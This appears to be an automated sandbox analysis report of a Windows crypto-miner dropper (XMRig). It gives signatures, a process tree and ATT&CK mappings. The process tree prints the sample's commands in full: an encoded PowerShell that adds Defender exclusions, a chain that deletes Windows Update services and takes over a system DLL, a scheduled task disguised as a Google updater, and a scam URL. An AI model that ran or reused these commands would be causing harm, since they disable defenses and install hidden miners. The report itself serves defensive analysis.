Analysis

  • max time kernel
    300s
  • max time network
    295s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    02-07-2022 22:20

General

  • Target

    be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe

  • Size

    7.5MB

  • MD5

    a29f3494661a52e3c66a2908389c5010

  • SHA1

    1645351e4b00a678ad7c4ac7784bf8d9c8703297

  • SHA256

    be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266

  • SHA512

    1b1314867540a94f60a7075c9021981ede269fda29411eba9b9ed33790010c0f836235c27938eccb5d592cb552d283cdf39ddaf9d28ab3d4d252ba82ada8e25e

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 13 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 46 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe
    "C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:988
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:300
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1656
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:664
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1088
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1932
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:1616
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:1584
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:300
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:1444
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:1600
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:1348
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:1844
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:804
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:1612
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:2012
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:1572
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1928
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:804
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1716
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1612
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1584
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:780
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              5⤵
                PID:1460
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                5⤵
                  PID:1108
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:300
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                    5⤵
                      PID:764
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      5⤵
                        PID:1700
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:896
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1056
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:432
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1580
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1640
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:564
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                        4⤵
                          PID:1580
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                            5⤵
                            • Creates scheduled task(s)
                            PID:1700
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                          4⤵
                            PID:1716
                            • C:\Windows\system32\schtasks.exe
                              schtasks /run /tn "GoogleUpdateTaskMachineQC"
                              5⤵
                                PID:292
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Windows\Temp\run.bat" "
                          2⤵
                          • Drops startup file
                          PID:1816
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Windows\Temp\lol.bat" "
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1928
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
                            3⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            • Suspicious use of WriteProcessMemory
                            PID:1064
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1064 CREDAT:275457 /prefetch:2
                              4⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of SetWindowsHookEx
                              PID:1380
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {7AFD42F6-868A-4BD5-B14E-FF6F65EB7B6C} S-1-5-18:NT AUTHORITY\System:Service:
                        1⤵
                        • Loads dropped DLL
                        PID:1472
                        • C:\Program Files\Chrome\updater.exe
                          "C:\Program Files\Chrome\updater.exe"
                          2⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:1696
                          • C:\Windows\System32\conhost.exe
                            "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                            3⤵
                            • Drops file in Drivers directory
                            • Suspicious use of SetThreadContext
                            • Drops file in Program Files directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1312
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
                              4⤵
                                PID:508
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
                                  5⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:536
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                4⤵
                                  PID:1732
                                  • C:\Windows\system32\sc.exe
                                    sc stop UsoSvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:1384
                                  • C:\Windows\system32\sc.exe
                                    sc stop WaaSMedicSvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:292
                                  • C:\Windows\system32\sc.exe
                                    sc stop wuauserv
                                    5⤵
                                    • Launches sc.exe
                                    PID:1736
                                  • C:\Windows\system32\sc.exe
                                    sc stop bits
                                    5⤵
                                    • Launches sc.exe
                                    PID:1256
                                  • C:\Windows\system32\sc.exe
                                    sc stop dosvc
                                    5⤵
                                    • Launches sc.exe
                                    PID:932
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1708
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                    5⤵
                                    • Modifies registry key
                                    PID:940
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                    5⤵
                                    • Modifies registry key
                                    PID:664
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                    5⤵
                                    • Modifies registry key
                                    PID:764
                                  • C:\Windows\system32\reg.exe
                                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1772
                                  • C:\Windows\system32\takeown.exe
                                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                    5⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:508
                                  • C:\Windows\system32\icacls.exe
                                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                    5⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:536
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:1628
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:564
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:668
                                  • C:\Windows\system32\reg.exe
                                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                    5⤵
                                    • Modifies registry key
                                    PID:276
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                    5⤵
                                      PID:1736
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                      5⤵
                                        PID:1932
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                        5⤵
                                          PID:1844
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                          5⤵
                                            PID:1928
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                            5⤵
                                              PID:1976
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                              5⤵
                                                PID:508
                                              • C:\Windows\system32\schtasks.exe
                                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                5⤵
                                                  PID:976
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                4⤵
                                                  PID:1928
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -hibernate-timeout-ac 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1336
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -hibernate-timeout-dc 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:564
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -standby-timeout-ac 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1248
                                                  • C:\Windows\system32\powercfg.exe
                                                    powercfg /x -standby-timeout-dc 0
                                                    5⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:508
                                                • C:\Windows\System32\conhost.exe
                                                  C:\Windows\System32\conhost.exe
                                                  4⤵
                                                    PID:1640
                                                    • C:\Windows\System32\conhost.exe
                                                      "C:\Windows\System32\conhost.exe" "adjdyakvdkolri"
                                                      5⤵
                                                        PID:1708
                                                    • C:\Windows\explorer.exe
                                                      C:\Windows\explorer.exe zhcixymdmjms1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1628

                                              Network

                                              MITRE ATT&CK Matrix ATT&CK v6

                                              Execution

                                              Scheduled Task

                                              1
                                              T1053

                                              Persistence

                                              Modify Existing Service

                                              2
                                              T1031

                                              Scheduled Task

                                              1
                                              T1053

                                              Privilege Escalation

                                              Scheduled Task

                                              1
                                              T1053

                                              Defense Evasion

                                              Modify Registry

                                              3
                                              T1112

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              Impair Defenses

                                              1
                                              T1562

                                              File Permissions Modification

                                              1
                                              T1222

                                              Discovery

                                              Query Registry

                                              2
                                              T1012

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              System Information Discovery

                                              3
                                              T1082

                                              Impact

                                              Service Stop

                                              1
                                              T1489

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Program Files\Chrome\updater.exe
                                                Filesize

                                                7.3MB

                                                MD5

                                                0c9bed327840bbe964e85913d5868fcb

                                                SHA1

                                                ef0b874b57be491ae87ed0237a025d5580265218

                                                SHA256

                                                3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                SHA512

                                                12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                              • C:\Program Files\Chrome\updater.exe
                                                Filesize

                                                7.3MB

                                                MD5

                                                0c9bed327840bbe964e85913d5868fcb

                                                SHA1

                                                ef0b874b57be491ae87ed0237a025d5580265218

                                                SHA256

                                                3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                SHA512

                                                12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                Filesize

                                                60KB

                                                MD5

                                                589c442fc7a0c70dca927115a700d41e

                                                SHA1

                                                66a07dace3afbfd1aa07a47e6875beab62c4bb31

                                                SHA256

                                                2e5cb72e9eb43baafb6c6bfcc573aac92f49a8064c483f9d378a9e8e781a526a

                                                SHA512

                                                1b5fa79e52be495c42cf49618441fb7012e28c02e7a08a91da9213db3ab810f0e83485bc1dd5f625a47d0ba7cfcdd5ea50acc9a8dcebb39f048c40f01e94155b

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                Filesize

                                                340B

                                                MD5

                                                44d5a46a6dfd00e821a97d2991c6894d

                                                SHA1

                                                8cd84e6cf6508b9faa6abdac49858f2761b81a90

                                                SHA256

                                                fe0b0fcdabe67d3de98c0ffa5d02566af2631c3bc1199f6cb386e61b10093a90

                                                SHA512

                                                86fe96c1a1217d05aa45a54c543a3dad17dd5d9c2e85a56fa24b6c51d7797a0e4cb58d38692722e350b23ed8c3b9b5e442d59d11002711e755bf58ef934bb628

                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\G49347K8.txt
                                                Filesize

                                                604B

                                                MD5

                                                7c5ad1c29e7e23f6fd38d2049371b6fb

                                                SHA1

                                                c1230d4fc2d03880054c0c540a51b1ef596803a6

                                                SHA256

                                                d1eaeb53f0812275cebd2189384fea8c046a7c636df956b9c1df0c1668f7f1b7

                                                SHA512

                                                6488daeffd908cc341a3642050f013dafa93ab18ce9bdcc49c422ebcc3027531db597ebca0a8cb33a11731dbca45bf9baa4cab363d176961dfca95e942f756fc

                                              • C:\Windows\Temp\lol.bat
                                                Filesize

                                                59B

                                                MD5

                                                f580e0e80cc87b25e38ea2c0c8059d04

                                                SHA1

                                                299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                SHA256

                                                9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                SHA512

                                                5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                              • C:\Windows\Temp\run.bat
                                                Filesize

                                                98B

                                                MD5

                                                731afe244b2414169a5f630d52646e56

                                                SHA1

                                                e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                SHA256

                                                6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                SHA512

                                                84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                              • C:\Windows\Temp\setup.exe
                                                Filesize

                                                7.3MB

                                                MD5

                                                0c9bed327840bbe964e85913d5868fcb

                                                SHA1

                                                ef0b874b57be491ae87ed0237a025d5580265218

                                                SHA256

